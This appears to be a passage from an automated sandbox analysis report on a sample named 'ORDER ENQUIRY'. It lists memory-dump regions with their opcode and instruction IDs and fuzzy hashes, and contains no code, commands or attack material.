                                                                                                                                                                          • Instruction Fuzzy Hash: 1411E272600705AFD7269B58CE88F9ABBB8EB80754F110029F6008F180D6B1ED44CB60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 091806fa2197089188d1258ae6114d078558a4e9cefba8b1551944636322aba6
                                                                                                                                                                          • Instruction ID: 799bc36383aa4821989cb8e09adbdfd203112549baf5185e71f6797314a61dbf
                                                                                                                                                                          • Opcode Fuzzy Hash: 091806fa2197089188d1258ae6114d078558a4e9cefba8b1551944636322aba6
                                                                                                                                                                          • Instruction Fuzzy Hash: C61104317016919BDB12CF4DC5C0A9ABBEDAF4A755B1840BDEE088F206D6B6D942C790
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                                          • Instruction ID: 640b6244a75b80d1da134ad345758b582ced7807ba0e1a2c98dbe5e5a41e8904
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                                          • Instruction Fuzzy Hash: 16218872600A41DFDB359F49C648A66FBF6EB94B50F14897DE94A9BA10C730EC01CB80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e4c272f1176408a3d2c029c9f681917ac27beccbb995671cfe1a02f418e95f36
                                                                                                                                                                          • Instruction ID: 78571980afb00c831b75ab50f616ca7930c717e3f7b0700b61456a61dce5c688
                                                                                                                                                                          • Opcode Fuzzy Hash: e4c272f1176408a3d2c029c9f681917ac27beccbb995671cfe1a02f418e95f36
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D219D71A01246DFCB14CF9CC581AAEBBB9FB88718F24416DD105AB311CB75AD06CBD0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fc6b4a451f2fb35769333cac8490a28dc0634ce16ce229248939ccd262a9b5e8
                                                                                                                                                                          • Instruction ID: b76a03c1400c98271ec55ccf6a73fc16c76be5223dee0fe90c6808b55009f2b6
                                                                                                                                                                          • Opcode Fuzzy Hash: fc6b4a451f2fb35769333cac8490a28dc0634ce16ce229248939ccd262a9b5e8
                                                                                                                                                                          • Instruction Fuzzy Hash: C2218C71600A01EFD7218F69C881B66B7F8FF54650F44882DE5AEC7250DB70A840CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 56be0c2c7b2ceee0d1a74e844208fb758e40a6af5058fef832f7506d73fd0339
                                                                                                                                                                          • Instruction ID: 4c73fa7f6f698c05a6fc1a5de67d174eac53da777c68877bcbefb868b1559f29
                                                                                                                                                                          • Opcode Fuzzy Hash: 56be0c2c7b2ceee0d1a74e844208fb758e40a6af5058fef832f7506d73fd0339
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A1125732051109BCB19CB28CD80A7BB766EBD5370B69456DD923CB280EA308C02C690
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cc27b79de6a0c9bc46236119c79d860c1420d4db7cb60c53b0ed1f3bc357e777
                                                                                                                                                                          • Instruction ID: 85a2d8456ff188910c6602cf94dc2e771cac1a2e5bdc153ca9af01b76bd7b8c0
                                                                                                                                                                          • Opcode Fuzzy Hash: cc27b79de6a0c9bc46236119c79d860c1420d4db7cb60c53b0ed1f3bc357e777
                                                                                                                                                                          • Instruction Fuzzy Hash: BA11E336640604FFD726DB5DCD40F9A77A8EF5AB50F018069F205DB251DBB0E901D7A0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0b909ad910cfba8c2183bf9b298d93950570e81a1bbf56161e5d5c73d3c9d261
                                                                                                                                                                          • Instruction ID: a4fb0bea7c8b70488150f8a55688505224cea3168d86e7541129d7bd7c0940e8
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b909ad910cfba8c2183bf9b298d93950570e81a1bbf56161e5d5c73d3c9d261
                                                                                                                                                                          • Instruction Fuzzy Hash: E2119EB6A51205DFCB25CF59C584A5ABBF8AFA4750F09847ED909AB311FB34DD00CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                          • Instruction ID: ad6e2d6ef71e3c9e6013b6521538912f1a0a3a5d33611536127f60b91405f3b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D11C436A00915AFDF1DCB68CC05B9DBBB5EF84210F0982A9E85697380E775BD51CB80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                          • Instruction ID: 249209a897d2b86c2b01551c281a43fb3c040da0edd3a407a7a7d650acd052cc
                                                                                                                                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                          • Instruction Fuzzy Hash: FD21C3B5A40B459FD3A0CF29D581B56BBF4FB48B20F10492EE98AC7B50E371E854CB94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                          • Instruction ID: bb6901b86dffddf332513cfbebab675a0e96bb052e10d52def05e0d8210833af
                                                                                                                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A11C631E00605EFEB299F48C940B567BE5EFC5754F0584AEFA099B190E731EC50DB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9772fbbcf61707b5a0244e1bcef3e4375694f35e168e2b2d5ef4dfe87a5f6943
                                                                                                                                                                          • Instruction ID: 980dc1292c5cd5d2eedcfea26851494b6180b3a9215f78c7579da650ec07c4a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 9772fbbcf61707b5a0244e1bcef3e4375694f35e168e2b2d5ef4dfe87a5f6943
                                                                                                                                                                          • Instruction Fuzzy Hash: 56012631206A85AFE31BA27DDC84F6B7B9CFF90750F4A40B6F9018B251DA14EC00C2A1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d9679faa85ff975ea143c1e7aee4103d4f09f37e306dcbb5a4bffaec16e80096
                                                                                                                                                                          • Instruction ID: 9a0e31ba0aae65b34c20d3115b012783181155bbd3087f4b5975e52dbc4840c7
                                                                                                                                                                          • Opcode Fuzzy Hash: d9679faa85ff975ea143c1e7aee4103d4f09f37e306dcbb5a4bffaec16e80096
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C11CE76200685AFDB25CF59D984F967BACEB8AB64F04411AF9068B653C370E880DF60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 02c4bfb6f9167725db88c9a0c48c27fe1307c993636ea6f704a959ee6adf0000
                                                                                                                                                                          • Instruction ID: 79e030b552183b24d8a0852d5f568d981f49400aa1fad39fb4a1b05f8f54e6e5
                                                                                                                                                                          • Opcode Fuzzy Hash: 02c4bfb6f9167725db88c9a0c48c27fe1307c993636ea6f704a959ee6adf0000
                                                                                                                                                                          • Instruction Fuzzy Hash: CC11E9362006129FD726EA69D840F67B7A5FFC4B11F154569E646C7690DB30E802C790
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9454cbddc00b3922ce11fc5357e4cc63a6e8546f02441d134b6c81e565c569d5
                                                                                                                                                                          • Instruction ID: 40dbf89c4e7728cfae748aecddca45ee59082f91dc0e51ae7ff2dda14c5ff61b
                                                                                                                                                                          • Opcode Fuzzy Hash: 9454cbddc00b3922ce11fc5357e4cc63a6e8546f02441d134b6c81e565c569d5
                                                                                                                                                                          • Instruction Fuzzy Hash: 3611C272A10615ABDB26DF59C9C4B9EFBF8EF54740F500858DA08A7201D734AD018F50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d6d05033af75dbbde00e4d0a0b71653144a3ee0dd62ac0c5ebb12f1d28465abb
                                                                                                                                                                          • Instruction ID: e9b3a2411274a14527520fb13ec84f7852e3d2e7580cb23bfdb00f5e01b812b0
                                                                                                                                                                          • Opcode Fuzzy Hash: d6d05033af75dbbde00e4d0a0b71653144a3ee0dd62ac0c5ebb12f1d28465abb
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E01F17160014AAFC325DF18D584F66BBFAFB81314F6081AAE1068B266D770ED42CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                          • Instruction ID: 0047c5097f4f8fc95c995b959f9f716154bbed355009a33d0cc29c39bb386b76
                                                                                                                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E11E572201AC29BEB27976CC944B753BA4EF00BC4F5E04E8DE428B642F329C846C250
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                          • Instruction ID: 8eb3284dbb91a8c57c9a1188cb8c89f9e417826d6a34587ff5830e94dd8ead08
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B01F536600105EFEB2A9F58CD40F5B7BA9EFC1B50F0581A6FA059B260E771DD50CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                          • Instruction ID: cda93277b4f64e8c011a311fcb6f86cb684ebba839e02f1f086a3c7b8ff4cba0
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                          • Instruction Fuzzy Hash: 85014572504B229BCB328F19D840A327BF4FF55B607408A2DFD958B2A1C331D828CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 720df5a2b3de4837979c03f04d7529e2d1a260d4608036d9ee577a3dbe99575a
                                                                                                                                                                          • Instruction ID: 3db42f82d6718bea24764c98fb49730670d81518c693c1844629af8c4a2f2a68
                                                                                                                                                                          • Opcode Fuzzy Hash: 720df5a2b3de4837979c03f04d7529e2d1a260d4608036d9ee577a3dbe99575a
                                                                                                                                                                          • Instruction Fuzzy Hash: 470145724416029FC336EF1CC904F52F7A8EB91B70B2643A9E9A89B1A2D730DC01CBC0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 145b9a528fd2638dea792352c141f96957bc8d56bc3a839915e449c17b317ab3
                                                                                                                                                                          • Instruction ID: 85f0b740ef3b101b93954d0f7adc273ededae3870b79b4dc54de1a0f943608ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 145b9a528fd2638dea792352c141f96957bc8d56bc3a839915e449c17b317ab3
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C11C431241641EFDB15EF59CD80F567BB8FF58B54F1400A9F9069B661C335ED01CAA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4cb1f6b75cb652b489920cee824f4e6615928c4953e5bac942f013a87d506f67
                                                                                                                                                                          • Instruction ID: 02cf8abdf0e5db594246f75c736d5701028e5ec7b0abd7ce78d88b573e327428
                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb1f6b75cb652b489920cee824f4e6615928c4953e5bac942f013a87d506f67
                                                                                                                                                                          • Instruction Fuzzy Hash: 04114870941229ABEB25AF64CE42FE9B2B8BF04710F5041D9B718A60E1DB709E81CF84
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                          • Instruction ID: 76e48faaadf0d9d51892daa5dbf58b1f1aa0f50046278d244bc904aa4605bb6f
                                                                                                                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 9001F5322001418BDF269A2DD8C0BA27B6AFFC4610F1944ABED058F287DA71AC81C790
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b26d8e188c6ba7cd1e001f23348763c9d6057af971d3180ee0484a95b966890b
                                                                                                                                                                          • Instruction ID: cbd68a3722267c083144b4c3054a623f3b18c10ff5f09f407c24a5da1b33c0ed
                                                                                                                                                                          • Opcode Fuzzy Hash: b26d8e188c6ba7cd1e001f23348763c9d6057af971d3180ee0484a95b966890b
                                                                                                                                                                          • Instruction Fuzzy Hash: A5111772900019BBCB15DB94CD85DEFBBBCEF58354F044166E916E7211EA34EA15CBE0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e712c8360d745233cc0805a80c999413d84b1287192fb48854b4fe3ccaea9988
                                                                                                                                                                          • Instruction ID: dd5d5c6f2c9a5d320d20d89f44daacdbf39f9f0b952babbe5338692e65793444
                                                                                                                                                                          • Opcode Fuzzy Hash: e712c8360d745233cc0805a80c999413d84b1287192fb48854b4fe3ccaea9988
                                                                                                                                                                          • Instruction Fuzzy Hash: E111C47264414A9FD715CF58D810BA6BBB9FB5A314F08C199E888CB315D732EC81DBE0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 01cf5f2fedac5d111ac2d059d12b513f56215bc1fce994f8091988c3fd9e3f8c
                                                                                                                                                                          • Instruction ID: 33bba78c4e71d64bd11c354df9616af82828ec90f7f456ae4ee3ccdf0dcf1bf6
                                                                                                                                                                          • Opcode Fuzzy Hash: 01cf5f2fedac5d111ac2d059d12b513f56215bc1fce994f8091988c3fd9e3f8c
                                                                                                                                                                          • Instruction Fuzzy Hash: 3111E8B5A002099BCB04DFA9D581AAEBBF8FF58250F10806AF905E7351D674EE01CBA4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ec29ff20a420604ec4e84a05387630c491e077829d3783be6f4b1af4b0dd4502
                                                                                                                                                                          • Instruction ID: 6576a8499254044ee59ac96814da37d4754a397787b4df1795bb28910af092de
                                                                                                                                                                          • Opcode Fuzzy Hash: ec29ff20a420604ec4e84a05387630c491e077829d3783be6f4b1af4b0dd4502
                                                                                                                                                                          • Instruction Fuzzy Hash: EF116935A0020DABCF15EFA4C951BAE7BB5EB49690F108099FA059B290DB35EE11CB94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                          • Instruction ID: e1066d2da7e12301032437bf06a2ec36c97544314fd9cf2b8159185d80423d50
                                                                                                                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 3201D8321407059FEB27A6A9C900FA77BF9FFC5660F44885DE9468B580EB71E401CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: bab9807c4e33fdc0a416ff34fd3cb56827a9e8efc8d6c6101565f97d5bc5cce2
                                                                                                                                                                          • Instruction ID: 33858f613b76142f1649b7d69a4e38377a03a7652a2971cc6b31d9c25cfa3386
                                                                                                                                                                          • Opcode Fuzzy Hash: bab9807c4e33fdc0a416ff34fd3cb56827a9e8efc8d6c6101565f97d5bc5cce2
                                                                                                                                                                          • Instruction Fuzzy Hash: FF01F7B2200915BFC315AB39CE40F57B7ACFF55A54B04062AF10983561DB24EC01C6E0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2cb4329d9ed9ed9d49e2957f61574c87b3a42c830d2354c7ba65a5ea32b0778c
                                                                                                                                                                          • Instruction ID: c1c1c341161d70f045ef4e52cdc3fc290c6bdaa6f7499fda70bb6d6d08d34f05
                                                                                                                                                                          • Opcode Fuzzy Hash: 2cb4329d9ed9ed9d49e2957f61574c87b3a42c830d2354c7ba65a5ea32b0778c
                                                                                                                                                                          • Instruction Fuzzy Hash: AC014C322147069BC324DF69D888AB7BBA8FF49720F118269F95887280E7309901C7D1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
